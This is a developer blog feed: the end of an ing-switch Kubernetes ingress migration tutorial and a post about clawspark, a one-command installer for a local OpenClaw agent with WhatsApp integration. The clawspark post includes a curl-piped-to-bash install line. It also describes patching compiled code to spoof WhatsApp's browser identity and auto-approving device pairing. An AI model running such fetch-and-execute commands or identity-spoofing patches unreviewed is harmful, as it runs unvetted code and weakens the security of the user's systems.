apiVersion: traefik.io/v1alpha1
kind: Middleware
metadata:
  name: demo-api-cors-ratelimit
  namespace: demo
spec:
  rateLimit:
    average: 50
    burst: 3
</code></pre>
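<p>One value worth reviewing by hand in the rate-limit Middleware: in ingress-nginx, <code>limit-burst-multiplier</code> multiplies <code>limit-rps</code> to give the burst size, while Traefik's <code>rateLimit.burst</code> is an absolute request count. A minimal sketch of the arithmetic, assuming you want to keep the same burst ceiling as the original annotations (the helper name <code>nginx_burst</code> is hypothetical):</p>
<pre><code class="language-bash"># Hypothetical helper: NGINX burst size = limit-rps * limit-burst-multiplier.
nginx_burst() {
  local rps="$1" multiplier="$2"
  echo $(( rps * multiplier ))
}

# Values from the api-cors Ingress: limit-rps=50, limit-burst-multiplier=3.
nginx_burst 50 3
# prints 150
</code></pre>
<p>Under that assumption, a Traefik <code>burst</code> of 150 would be the closest match to the NGINX behaviour, so treat the generated value as something to confirm before cutover.</p>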
<pre><code class="language-yaml"># ForwardAuth (external authentication)
apiVersion: traefik.io/v1alpha1
kind: Middleware
metadata:
  name: demo-dashboard-forwardauth
  namespace: demo
spec:
  forwardAuth:
    address: "https://auth.example.com/verify"
    authResponseHeaders:
    - "X-User-ID"
    - "X-User-Email"
</code></pre>
<pre><code class="language-yaml"># IP AllowList
apiVersion: traefik.io/v1alpha1
kind: Middleware
metadata:
  name: demo-dashboard-ipallowlist
  namespace: demo
spec:
  ipAllowList:
    sourceRange:
    - "10.0.0.0/8"
    - "172.16.0.0/12"
</code></pre>
<h3>Step 8: Review the Migration Report</h3>
<p>The <code>migrate</code> command automatically generates <code>00-migration-report.md</code> in the output directory. Open it to see the full summary:</p>
<pre><code class="language-bash">cat ./migration/00-migration-report.md
</code></pre>
<pre><code class="language-markdown"># ing-switch Migration Report
**Target Controller:** gateway-api-traefik

## Summary
| Metric | Count |
|--------|-------|
| Total Ingresses | 3 |
| Fully Compatible | 0 |
| Needs Workarounds | 3 |
| Has Unsupported Annotations | 0 |

## demo/api-cors -- Needs workaround
| Annotation | Status | Target Resource | Notes |
|-----------|--------|-----------------|-------|
| enable-cors | OK | HTTPRoute (CORS filter) | Native CORS filter (GA in v1.5) |
| cors-allow-origin | OK | HTTPRoute (CORS filter) | allowOrigins in CORS filter |
| limit-rps | WARN | BackendTrafficPolicy | Envoy Gateway BackendTrafficPolicy |
...
</code></pre>
<h3>Step 9: Apply (Dry-Run First)</h3>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/b4c92aec-3c11-41e4-84da-bce1b3891573.png" alt="" style="display:block;margin:0 auto" />

<pre><code class="language-bash"># Install Gateway API CRDs
bash ./migration/01-install-gateway-api-crds/install.sh

# Install Traefik with Gateway API provider
bash ./migration/02-install-traefik-gateway/helm-install.sh

# Dry-run all resources first
kubectl apply -f ./migration/03-gateway/ --dry-run=server
kubectl apply -f ./migration/04-httproutes/ --dry-run=server
kubectl apply -f ./migration/05-policies/ --dry-run=server

# If dry-run passes, apply for real
kubectl apply -f ./migration/03-gateway/
kubectl apply -f ./migration/04-httproutes/
kubectl apply -f ./migration/05-policies/
</code></pre>
<p>At this point, <strong>both NGINX and Traefik are running side by side</strong>. DNS still points to NGINX. Production traffic is untouched.</p>
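<p>Because DNS still points to NGINX, you can exercise the new routes directly against Traefik before cutover. A minimal sketch using curl's <code>--resolve</code> flag, assuming Traefik's Service is reachable on port 80 at an IP you look up yourself. The helper name and the <code>203.0.113.10</code> address are placeholders, and the generated <code>06-verify.sh</code> may already cover similar checks.</p>
<pre><code class="language-bash"># Hypothetical helper: send a request for HOST to a specific IP, bypassing DNS,
# and print only the HTTP status code.
check_via_traefik() {
  local host="$1" ip="$2" path="$3"
  curl -sS -o /dev/null -w '%{http_code}\n' \
    --resolve "$host:80:$ip" "http://$host$path"
}

# Example (placeholder IP from the documentation address range):
#   check_via_traefik api.example.com 203.0.113.10 /v1
</code></pre>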
<h3>Step 10: Verify and Cutover</h3>
<pre><code class="language-bash"># Run the generated verification script
bash ./migration/06-verify.sh

# Once verified, update DNS to Traefik's IP
# Then clean up NGINX
bash ./migration/07-cleanup/remove-nginx.sh
</code></pre>
<h3>Step 11: Use the Web UI</h3>
<p>For teams that prefer a visual workflow:</p>
<pre><code class="language-bash">ing-switch ui
# Opens http://localhost:8080
</code></pre>
<p>The dashboard provides four pages:</p>
<p><strong>Detect</strong> -- Scan your cluster and see all ingresses with annotation counts and complexity:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/609e59ce-ab2a-40ac-8aa9-a864ad9be8e6.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Analyze</strong> -- Choose between 3 targets and see the full annotation compatibility matrix:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/c6fa8d3a-1723-4e8f-bf54-f32d823ccf91.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Migrate</strong> -- One-click generation with step-by-step checklist and dry-run buttons:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/344c9635-82e2-430e-aee4-7d1595bf96a7.png" alt="" style="display:block;margin:0 auto" />

<p>View all generated files inline with syntax highlighting:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/0b3a75b4-5b82-4d70-b340-7cf0ba784f63.png" alt="" style="display:block;margin:0 auto" />

<p>See migration gaps with impact ratings and fix instructions:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/4b9e6053-3d6e-42ba-896a-44b3727e8349.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Validate</strong> -- Run live cluster checks to confirm your migration phase:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/f64e5599-45ac-490a-a6fd-757f9fda13ad.png" alt="" style="display:block;margin:0 auto" />

<h3>Cleanup</h3>
<pre><code class="language-bash">vcluster delete demo --driver docker
</code></pre>
<pre><code class="language-plaintext">done  Successfully deleted virtual cluster demo
</code></pre>
<h2>What Makes ing-switch Different</h2>
<table>
<thead>
<tr>
<th>Feature</th>
<th>ing-switch</th>
<th>ingress2gateway</th>
<th>Manual</th>
</tr>
</thead>
<tbody><tr>
<td>Annotation coverage</td>
<td>119</td>
<td>30+</td>
<td>You count</td>
</tr>
<tr>
<td>Traefik Ingress target</td>
<td>Yes</td>
<td>No</td>
<td>--</td>
</tr>
<tr>
<td>Gateway API (Traefik)</td>
<td>Yes</td>
<td>No</td>
<td>--</td>
</tr>
<tr>
<td>Gateway API (Envoy)</td>
<td>Yes</td>
<td>Yes</td>
<td>--</td>
</tr>
<tr>
<td>Impact ratings</td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Web UI</td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Install scripts</td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Verification scripts</td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>DNS migration guide</td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Dry-run mode</td>
<td>Yes</td>
<td>No</td>
<td>--</td>
</tr>
</tbody></table>
<h2>The Ecosystem Is Ready</h2>
<ul>
<li><p><strong>Gateway API v1.5</strong> -- CORS filter, TLSRoute, BackendTLSPolicy all GA</p>
</li>
<li><p><strong>ingress2gateway v1.0</strong> -- Official tool with emitter architecture</p>
</li>
<li><p><strong>Traefik v3.7</strong> -- Native NGINX annotation provider (80+ annotations)</p>
</li>
<li><p><strong>Envoy Gateway v1.7</strong> -- XListenerSet, enhanced policies</p>
</li>
<li><p><strong>cert-manager v1.20</strong> -- Gateway API ListenerSet support</p>
</li>
<li><p><strong>Kubernetes 1.36</strong> -- Ships April 22, first release post-NGINX archival</p>
</li>
</ul>
<p>The tools exist. The standards are stable. The only thing left is to actually run the migration.</p>
<hr />
<p><strong>Star it, fork it, migrate today:</strong> <a href="https://github.com/saiyam1814/ing-switch">github.com/saiyam1814/ing-switch</a></p>
<p><em>ing-switch is open source under the MIT license. PRs welcome.</em></p>
]]></content:encoded></item><item><title><![CDATA[clawspark: Your Private OpenClaw AI Assistant That Never Phones Home]]></title><description><![CDATA[By Saiyam Pathak

OpenClaw has 314,000+ GitHub stars. It is the most popular open-source AI agent out there. It connects to WhatsApp and Telegram, does deep research, manages files, writes code, handl]]></description><link>https://blog.kubesimplify.com/clawspark-your-private-openclaw-ai-assistant-that-never-phones-home</link><guid isPermaLink="true">https://blog.kubesimplify.com/clawspark-your-private-openclaw-ai-assistant-that-never-phones-home</guid><category><![CDATA[ai-agent]]></category><category><![CDATA[ollama]]></category><category><![CDATA[openclaw]]></category><category><![CDATA[clawspark]]></category><category><![CDATA[AI Assistants ]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Sun, 15 Mar 2026 15:37:37 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/fc9a8e16-4bcb-4bc8-a01e-46daf8c3fb7c.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><em>By Saiyam Pathak</em></p>
<hr />
<p>OpenClaw has 314,000+ GitHub stars. It is the most popular open-source AI agent out there. It connects to WhatsApp and Telegram, does deep research, manages files, writes code, handles voice notes, and genuinely works as a personal assistant. The catch is that setting it up securely with a local LLM on NVIDIA hardware is a long, manual process.</p>
<p>I spent some time getting it right on a DGX Spark. Then I automated the entire thing into one command. Along the way I found nine bugs, wrote three source patches, fought Ubuntu's managed Python, debugged WhatsApp's device linking protocol, and integrated a hardware-aware model selection engine. This is the full story.</p>
<h2>The Problem</h2>
<p>NVIDIA's DGX Spark is a desktop AI supercomputer. GB10 Grace Blackwell chip, 128GB unified memory, 1 PFLOP of AI compute, 20-core Arm CPU (10 Cortex-X925 and 10 Cortex-A725 cores). It sits on your desk, runs quietly, and has enough memory to load models that actually compete with cloud APIs. The hardware is not the bottleneck anymore.</p>
<p>The bottleneck is setup. If you want to run OpenClaw with a local model on DGX Spark, here is what you need to do manually:</p>
<ol>
<li><p>Install Node.js 22+</p>
</li>
<li><p>Install OpenClaw via npm</p>
</li>
<li><p>Install Ollama</p>
</li>
<li><p>Figure out which model fits your hardware (there are hundreds)</p>
</li>
<li><p>Pull the model (can be 20-80GB)</p>
</li>
<li><p>Configure OpenClaw to point at your local Ollama instance</p>
</li>
<li><p>Set the correct environment variables (OLLAMA_API_KEY, OLLAMA_BASE_URL)</p>
</li>
<li><p>Run onboard, which sets half your config to wrong defaults</p>
</li>
<li><p>Fix tools.profile from "messaging" to "full"</p>
</li>
<li><p>Start the gateway, then start a separate Node Host process</p>
</li>
<li><p>Pair the Node Host to the gateway</p>
</li>
<li><p>Link WhatsApp via QR code</p>
</li>
<li><p>Patch three different JavaScript files in OpenClaw's dist folder</p>
</li>
<li><p>Install skills</p>
</li>
<li><p>Harden security</p>
</li>
<li><p>Set up voice transcription</p>
</li>
</ol>
<p>Miss one step and things fail silently. The gateway starts, the model loads, but your agent can only send text messages because it has 5 tools instead of 15. Or WhatsApp linking fails because the browser identification string gets rejected. Or group messages never arrive because history sync is disabled.</p>
<p>NVIDIA's own docs at build.nvidia.com recommend gpt-oss-120b for DGX Spark and describe a manual multi-step process using Ollama or LM Studio. Their guide covers the inference setup but not WhatsApp integration, not voice transcription, not security hardening, and not the Node Host that the agent actually needs to do useful work. clawspark automates all of this, including the parts NVIDIA's guide does not cover.</p>
<h2>What clawspark Does</h2>
<p>One command:</p>
<pre><code class="language-bash">curl -fsSL https://clawspark.dev/install.sh | bash
</code></pre>
<p>That is it. The installer runs 14 steps. It detects your hardware, recommends a model, asks a few questions, then installs and configures everything. Here is the full flow:</p>
<p><strong>Step 1-2: Hardware detection.</strong> The script probes your GPU via nvidia-smi, reads DMI product name for DGX Spark identification, checks for Tegra signatures on Jetson, and measures total system memory. It classifies your hardware into one of four tiers: DGX Spark (128GB unified), Jetson AGX (64GB), RTX high-end (24GB+ VRAM), or RTX standard (8-24GB).</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/e77d09be-44ed-4a07-9856-f6a8798020e3.jpg" alt="" style="display:block;margin:0 auto" />
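<p>To make the tiering concrete, here is a minimal sketch of how such a classification could look. It is not clawspark's actual code: the function name, the tier labels, and the assumption that the DMI product name contains "DGX Spark" are all illustrative.</p>
<pre><code class="language-bash"># Hypothetical tier classifier. Inputs would typically come from:
#   product: cat /sys/class/dmi/id/product_name
#   vram_gb: nvidia-smi --query-gpu=memory.total --format=csv,noheader,nounits
#            (reported in MiB, so convert to whole GB first)
classify_tier() {
  local product="$1" vram_gb="$2"
  case "$product" in
    *"DGX Spark"*) echo "dgx-spark" ;;
    *Tegra*|*Jetson*) echo "jetson-agx" ;;
    *)
      if [ "$vram_gb" -ge 24 ]; then
        echo "rtx-high"
      elif [ "$vram_gb" -ge 8 ]; then
        echo "rtx-standard"
      else
        echo "unsupported"
      fi
      ;;
  esac
}

classify_tier "NVIDIA DGX Spark" 0   # prints dgx-spark
classify_tier "Generic Desktop" 12   # prints rtx-standard
</code></pre>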

<p><strong>Step 3: Model selection.</strong> This is where it gets interesting. For DGX Spark, I curated a list of 5 models ranked by <a href="https://github.com/AlexsJones/llmfit">llmfit</a> score and verified on real hardware:</p>
<table>
<thead>
<tr>
<th>Model</th>
<th>Size</th>
<th>Estimated tok/s</th>
<th>llmfit Score</th>
<th>Use Case</th>
</tr>
</thead>
<tbody><tr>
<td>qwen3.5:35b-a3b (default)</td>
<td>18 GB</td>
<td>~59 (measured)</td>
<td>91.8</td>
<td>General purpose</td>
</tr>
<tr>
<td>qwen3.5:122b-a10b</td>
<td>33 GB</td>
<td>~45</td>
<td>95.5</td>
<td>Best quality MoE</td>
</tr>
<tr>
<td>qwen3-coder-next</td>
<td>52 GB</td>
<td>~109</td>
<td>93.6</td>
<td>Coding/agentic</td>
</tr>
<tr>
<td>qwen3-next</td>
<td>50 GB</td>
<td>~59</td>
<td>92.2</td>
<td>Chat/instruct</td>
</tr>
<tr>
<td>qwen3-coder:30b</td>
<td>19 GB</td>
<td>~58</td>
<td>94.1</td>
<td>Coding lightweight</td>
</tr>
</tbody></table>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/81931dba-337d-49ee-9b44-5548d4b2878b.jpg" alt="" style="display:block;margin:0 auto" />

<p>For non-DGX-Spark hardware (RTX, Jetson, anything else), the installer uses llmfit to analyze your specific hardware, score hundreds of models, map the results to Ollama model IDs, verify each candidate actually exists on the Ollama library, and present the top 5 that fit. No hardcoded lists. Your GPU, your recommendations.</p>
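<p>The "filter by fit, then rank by score" idea can be sketched in a few lines. This is only an illustration of the selection step, not llmfit's scoring algorithm; the function name and the input format (<code>name size_gb score</code> per line) are assumptions, and the sample rows reuse figures from the table above.</p>
<pre><code class="language-bash"># Hypothetical selector: keep models whose size fits the memory budget,
# sort by score (highest first), and print the top N model names.
pick_models() {
  local budget_gb="$1" top_n="$2"
  while read -r name size_gb score; do
    if [ "$size_gb" -le "$budget_gb" ]; then
      printf '%s %s\n' "$score" "$name"
    fi
  done | sort -rn | head -n "$top_n" | cut -d' ' -f2
}

# Sample: 40 GB budget, top 2 candidates.
printf '%s\n' \
  'qwen3.5:35b-a3b 18 91.8' \
  'qwen3.5:122b-a10b 33 95.5' \
  'qwen3-coder-next 52 93.6' \
  'qwen3-next 50 92.2' \
  'qwen3-coder:30b 19 94.1' \
  | pick_models 40 2
</code></pre>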
<p><strong>Step 4-5: Deployment and messaging.</strong> Choose local-only or hybrid (cloud fallback). Choose WhatsApp, Telegram, both, or skip messaging entirely. The web UI at <code>/__openclaw__/canvas/</code> always works regardless.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/a20d26e8-5507-47a6-ad86-57907be5f1c5.jpg" alt="" style="display:block;margin:0 auto" />

<p><strong>Step 6-14: The actual installation.</strong> Ollama install and model pull. Node.js 22 if needed. OpenClaw npm install. Config generation with correct Ollama endpoints. Onboard with overrides for all the wrong defaults. Three source patches (more on these below). Skills installation. Whisper voice setup. WhatsApp QR linking. Optional Tailscale for remote access. ClawMetry dashboard. Security hardening. Final verification.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/0b947b8a-fcac-424e-ba52-80b87f58a13d.jpg" alt="" style="display:block;margin:0 auto" />

<p>After installation, you get the <code>clawspark</code> CLI tool for day-to-day management: <code>clawspark status</code>, <code>clawspark benchmark</code>, <code>clawspark restart</code>, <code>clawspark skills sync</code>, <code>clawspark airgap on/off</code>, and more.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/283cd367-ff8f-4357-a604-88bc1c315ffd.jpg" alt="" style="display:block;margin:0 auto" />

<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/ea479d57-267c-4d78-ab36-cea2e3e9ebec.jpg" alt="" style="display:block;margin:0 auto" />

<h2>The Architecture</h2>
<p>Here is how the pieces fit together once everything is running:</p>
<pre><code class="language-plaintext">WhatsApp / Telegram / Web UI (Canvas)
              |
    OpenClaw Gateway (port 18789)
     |            |            |
   Agent      Node Host     Baileys
   (LLM)      (Tools)      (WhatsApp Web)
     |            |
   Ollama      15 tools:
  (port 11434)  exec, read, write, edit,
     |          web_fetch, message, canvas,
   Model        process, cron, nodes,
   (GPU)        sessions_spawn, vision,
                transcribe, memory_search,
                memory_store
</code></pre>
<p>The Gateway is the central process. It manages the agent, routes messages from WhatsApp/Telegram/Web, and coordinates tool calls. The Agent is the LLM reasoning loop that decides what to do. The Node Host is a separate process that provides the actual tool implementations -- reading files, fetching web pages, executing code. Without the Node Host, the agent has only 5 basic messaging tools instead of the full 15.</p>
<p>Baileys is the WhatsApp Web client library that OpenClaw uses under the hood. It connects to WhatsApp's servers using a linked device session, the same way WhatsApp Web works in your browser. Messages flow from WhatsApp through Baileys to the Gateway, which sends them to the Agent, which calls tools on the Node Host, and the response flows back the same way.</p>
<h2>The Bugs I Found and Fixed</h2>
<p>This section is the reason I wrote this post. These are all real issues I hit on real hardware, and some of them took hours to diagnose. If you are setting up OpenClaw manually, this list might save you a lot of time.</p>
<h3><strong>1. tools.profile does not default to "full"</strong></h3>
<p>When you run <code>openclaw onboard</code>, it does not set <code>tools.profile</code> to "full". In v2026.3.2 it defaulted to "messaging" (5 tools only). This was partially fixed in v2026.3.7, which changed the default to "coding" -- better, but still missing tools like exec, process, cron, and nodes. The agent looks like it is working, but it cannot do everything it should.</p>
<p>The fix: <code>openclaw config set tools.profile full</code> after onboard completes. clawspark does this automatically.</p>
<h3><strong>2. Node Host is required but not documented</strong></h3>
<p>The Gateway alone does not provide execution tools. You need a separate "Node Host" process (<code>openclaw node run</code>) that connects to the Gateway and provides filesystem, browser, and execution capabilities. Without it, even with <code>tools.profile full</code>, the agent has no execution tools to call. The Node Host also needs to be paired with the Gateway (device approval), which is another step that is easy to miss.</p>
<p>clawspark starts the Node Host, detects pending pairing requests, auto-approves them, and restarts the Node Host with the pairing token.</p>
<h3><strong>3. Baileys browser string rejected by WhatsApp</strong></h3>
<p>OpenClaw's WhatsApp integration uses Baileys, which identifies itself as <code>["openclaw", "cli", VERSION]</code> to WhatsApp's servers. WhatsApp rejects this during device linking. The QR code scan works, but the connection fails silently.</p>
<p>The fix is a source patch: replace the browser identification with <code>["Ubuntu", "Chrome", "22.0"]</code>, which WhatsApp accepts. This requires patching the compiled JavaScript in OpenClaw's dist folder. clawspark finds the relevant session files and applies the patch automatically.</p>
<h3><strong>4. web_search requires a Brave API key</strong></h3>
<p>OpenClaw's built-in web_search tool requires a Brave Search API key. For a local setup, requiring an external API key defeats the purpose. clawspark works around this by configuring the agent's <code>TOOLS.md</code> to use DuckDuckGo Lite via web_fetch instead:</p>
<pre><code class="language-plaintext">web_fetch with url="https://lite.duckduckgo.com/lite/?q=YOUR+QUERY"
</code></pre>
<p>This gives the agent web search capabilities without requiring any API keys.</p>
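<p>For a quick manual check of the same endpoint, the query URL can be built like this. A minimal sketch: the helper name is hypothetical, and it only converts spaces to <code>+</code>, so queries with other reserved characters would need proper percent-encoding.</p>
<pre><code class="language-bash"># Hypothetical helper: build a DuckDuckGo Lite search URL from the arguments.
# Only spaces are encoded here; other reserved characters are left as-is.
ddg_lite_url() {
  local query="$*"
  echo "https://lite.duckduckgo.com/lite/?q=${query// /+}"
}

ddg_lite_url kubernetes gateway api
# prints https://lite.duckduckgo.com/lite/?q=kubernetes+gateway+api
</code></pre>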
<h3><strong>5. Agent narrates tool usage on WhatsApp</strong></h3>
<p>When you ask the agent a question on WhatsApp, it sends messages like "Let me search for that..." and "The search returned these results..." before giving you the actual answer. On WhatsApp, this means three or four notification buzzes for one question.</p>
<p>The fix is <code>SOUL.md</code> rules: explicit instructions to never narrate tool usage, use tools silently, and respond with one clean message.</p>
<h3><strong>6. syncFullHistory breaks group messages</strong></h3>
<p>OpenClaw defaults to <code>syncFullHistory: false</code> in its Baileys configuration. This means after a fresh WhatsApp link, Baileys never receives group sender keys. The result: groups are completely silent. No messages arrive, no errors are logged. It just looks like nobody is talking.</p>
<p>The fix: patch <code>syncFullHistory: false</code> to <code>syncFullHistory: true</code> in the compiled session files. clawspark finds and patches all relevant files automatically.</p>
<h3><strong>7. Mention detection has an early return that blocks text @mentions</strong></h3>
<p>OpenClaw's mention detection in group chats has a <code>return false</code> early exit when JID (WhatsApp ID) mentions exist but do not match the bot's JID. The problem is that WhatsApp resolves @mentions to JIDs, and sometimes the resolved JID does not match the bot's linked phone JID. The early return prevents the text-pattern fallback from ever running, so typing @botname in a group never triggers the bot.</p>
<p>The fix: remove the <code>return false</code> line so the text-pattern fallback always has a chance to match. Another source patch to the compiled JavaScript.</p>
<h3><strong>8. Systemd service missing Ollama environment variables</strong></h3>
<p>When OpenClaw's gateway runs as a systemd service, it does not inherit the shell environment. The OLLAMA_API_KEY and OLLAMA_BASE_URL variables are missing, so the gateway cannot reach Ollama. The model appears to load, but every inference call fails.</p>
<p>clawspark writes the environment variables to a gateway.env file, adds them to the user's shell profile (.bashrc or .zshrc), and sources them before starting any OpenClaw process.</p>
<h3><strong>9. OpenClaw bindings schema changed between versions</strong></h3>
<p>This one cost me an entire evening. Earlier versions of OpenClaw supported a <code>bindings</code> config for routing different message sources to different agents (e.g., full tools in DMs, restricted tools in groups). Starting with v2026.3.2, the bindings schema changed and the old format causes a validation error at startup: <code>Invalid config: bindings.0: Invalid input</code>. This is not a bug per se, since the schema simply evolved, but any guide or config written for earlier versions will now fail at startup.</p>
<p>The fix: remove bindings entirely and use a single agent with context-aware rules. <code>SOUL.md</code> and <code>TOOLS.md</code> contain explicit sections for DM context (full tools) and group context (Q&amp;A only). The agent enforces the boundary at the prompt level. Groups also use <code>requireMention: true</code> and <code>groupPolicy: open</code> at the config level so the bot only responds when @mentioned.</p>
<h2>Security</h2>
<p>Running a local AI agent is not automatically secure. clawspark applies multiple layers:</p>
<p><strong>Gateway binding.</strong> The OpenClaw gateway binds to localhost only. It is not accessible from other machines on your network unless you explicitly set up Tailscale.</p>
<p><strong>Firewall rules.</strong> UFW is configured to deny all incoming connections except SSH. Outgoing traffic is allowed by default, or blocked entirely in air-gap mode.</p>
<p><strong>Token authentication.</strong> A random 256-bit token is generated during installation. Only clients with this token can talk to the gateway API.</p>
<p><strong>Context-aware tool restrictions.</strong> In direct messages, the owner gets full access to all 15 tools. In group chats, the agent restricts itself to Q&amp;A only (message, web_fetch, memory). This is enforced at the prompt level via SOUL.md, which contains explicit rules for each context. Groups also require @mention to activate.</p>
<p><strong>SOUL.md and TOOLS.md.</strong> These workspace files contain the agent's identity, capabilities, and absolute rules. No credential disclosure (applies to all users, including the owner). No system information in groups. No self-modification. Both files are set to chmod 444 (read-only) so the agent cannot edit its own rules.</p>
<p><strong>Air-gap mode.</strong> For maximum isolation, <code>clawspark airgap on</code> blocks all outbound internet traffic via UFW. Only local network and loopback traffic is allowed. The model, the agent, and all tools run entirely offline.</p>
<p>One honest caveat: local models do not have the same safety filters that cloud providers build into their APIs. That is both a feature (no arbitrary refusals) and a responsibility. You should think carefully about who has access to message your bot.</p>
<h2>Real Performance Numbers</h2>
<p>All numbers below are from an actual DGX Spark running Linux 6.14.0-1015-nvidia (arm64), Ollama 0.17.7, Node.js v22.22.1, OpenClaw v2026.3.13, with Qwen 3.5 35B-A3B:</p>
<table>
<thead>
<tr>
<th>Metric</th>
<th>Value</th>
</tr>
</thead>
<tbody><tr>
<td>Cold model load (first query)</td>
<td>~41 seconds</td>
</tr>
<tr>
<td>Warm prompt evaluation</td>
<td>~265 tok/s</td>
</tr>
<tr>
<td>Warm text generation</td>
<td>~59 tok/s</td>
</tr>
<tr>
<td>End-to-end WhatsApp response</td>
<td>15-45 seconds</td>
</tr>
</tbody></table>
<p>The 59 tok/s generation speed is fast enough to feel responsive. You send a question on WhatsApp and the response arrives in 15-45 seconds depending on complexity. The cold load penalty only hits on the first query after a restart. After that, the model stays in memory.</p>
<p>To put this in perspective: 59 tok/s means the model generates roughly 45-50 words per second. A typical response of 200 words takes about 4 seconds of pure generation time. The rest of the 15-45 second latency comes from the WhatsApp message routing, tool calls (if the agent needs to search the web or read a file), and response formatting.</p>
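<p>The arithmetic behind that estimate is short enough to sketch in Python. The 0.8 words-per-token ratio is an assumption (a common rule of thumb for English text), not something measured on this setup, and <code>generation_seconds</code> is just an illustrative helper name.</p>
<pre><code class="language-python"># Rough generation-time estimate from a measured decode rate.
# WORDS_PER_TOKEN is an assumed rule of thumb for English text, not a measurement.
WORDS_PER_TOKEN = 0.8


def generation_seconds(words, tokens_per_second, words_per_token=WORDS_PER_TOKEN):
    """Seconds of pure generation needed to emit `words` words."""
    tokens_needed = words / words_per_token
    return tokens_needed / tokens_per_second


words_per_second = 59 * WORDS_PER_TOKEN
seconds = generation_seconds(200, 59)
print(f"{words_per_second:.1f} words/s, {seconds:.1f} s for a 200-word reply")
</code></pre>
<p>With a different words-per-token ratio the figures shift a little, but generation stays a small slice of the 15-45 second end-to-end latency.</p>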
<p>Is this as fast as GPT-4o or Claude via cloud API? No. Cloud inference on dedicated hardware with massive batching will always be faster for raw token throughput. But it is fast enough for practical use, and your data never leaves your desk. That is the tradeoff.</p>
<p>For the 122B-A10B MoE model (the highest-ranked by llmfit), expect roughly 45 tok/s. Slightly slower but you get access to the full 122B model's knowledge with only 10B active parameters. The DGX Spark's 128GB unified memory can comfortably hold this model (33GB) with plenty of room for the KV cache.</p>
<h2>Hardware-Aware Model Selection with llmfit</h2>
<p>One of the hardest problems with local AI is knowing which model to use. There are hundreds of models on Ollama, each with different sizes, quantizations, and performance characteristics. Picking the wrong one means either wasting memory (model too small for the hardware) or crashing on load (model too big).</p>
<p>I integrated <a href="https://github.com/AlexsJones/llmfit">llmfit</a> to solve this. llmfit is a Rust-based CLI tool that detects your hardware (GPU, VRAM, RAM, CPU), scores every model in its database for fit, speed, and quality, and tells you which ones will actually run well.</p>
<p>For DGX Spark, I ran llmfit on the real hardware and it correctly detected the NVIDIA GB10 with 119.7 GB unified memory and CUDA backend. I then cross-referenced its top recommendations against the Ollama library to verify each model is actually pullable. The result is the curated list of 5 models you see during installation.</p>
<p>For all other hardware, the installer runs llmfit live:</p>
<ol>
<li><p>Install llmfit (one curl command, Rust binary)</p>
</li>
<li><p>Run <code>llmfit recommend --json -n 20 --min-fit good</code></p>
</li>
<li><p>Map each HF-style model name to an Ollama model ID (40+ regex patterns)</p>
</li>
<li><p>Verify each candidate exists on Ollama's library (HTTP check against ollama.com)</p>
</li>
<li><p>Present the top 5 verified models with score, estimated tok/s, and fit level</p>
</li>
</ol>
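<p>Step 3 is the least obvious part of that list, so here is a minimal sketch of the idea. The pattern table and the <code>to_ollama_id</code> helper are hypothetical illustrations, not clawspark's actual rules, and the input names are made-up examples of Hugging Face style identifiers.</p>
<pre><code class="language-python">import re

# Hypothetical pattern table: each entry maps a Hugging Face style name
# to an Ollama tag template. Illustrative only, not clawspark's real rules.
PATTERNS = [
    (re.compile(r"qwen3\.5-(\d+b)-(a\d+b)", re.IGNORECASE), "qwen3.5:{0}-{1}"),
]


def to_ollama_id(hf_name):
    """Return an Ollama-style model ID for hf_name, or None if nothing matches."""
    for pattern, template in PATTERNS:
        match = pattern.search(hf_name)
        if match:
            parts = [group.lower() for group in match.groups()]
            return template.format(*parts)
    return None


print(to_ollama_id("Qwen/Qwen3.5-35B-A3B"))    # qwen3.5:35b-a3b
print(to_ollama_id("some-org/unknown-model"))  # None
</code></pre>
<p>Returning <code>None</code> for unmatched names lets a caller drop those candidates before spending an HTTP request on the verification in step 4.</p>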
<p>If llmfit is not available or fails, the installer falls back to curated lists per hardware tier. No hardcoded guessing. Your GPU, your recommendations.</p>
<h2>WhatsApp Integration: The Deep Cut</h2>
<p>Getting WhatsApp working reliably was the hardest part of this entire project. Here is why.</p>
<p>OpenClaw uses the Baileys library, which is an unofficial WhatsApp Web client. It works by emulating a linked device session, the same protocol that WhatsApp Web uses in your browser. The connection is end-to-end encrypted and goes through WhatsApp's servers. There is no official API involved.</p>
<p>This creates three categories of problems:</p>
<p><strong>Protocol issues.</strong> WhatsApp regularly changes its protocol, and Baileys has to keep up. The browser string rejection (bug #3) is an example. WhatsApp started rejecting non-standard browser identifiers at some point, and OpenClaw's default string got caught.</p>
<p><strong>Group message handling.</strong> WhatsApp groups use Signal's sender keys protocol. When you first link a device, it needs to receive sender keys from all group participants before it can decrypt group messages. Setting <code>syncFullHistory: false</code> (bug #6) prevents this initial key exchange, making groups completely silent.</p>
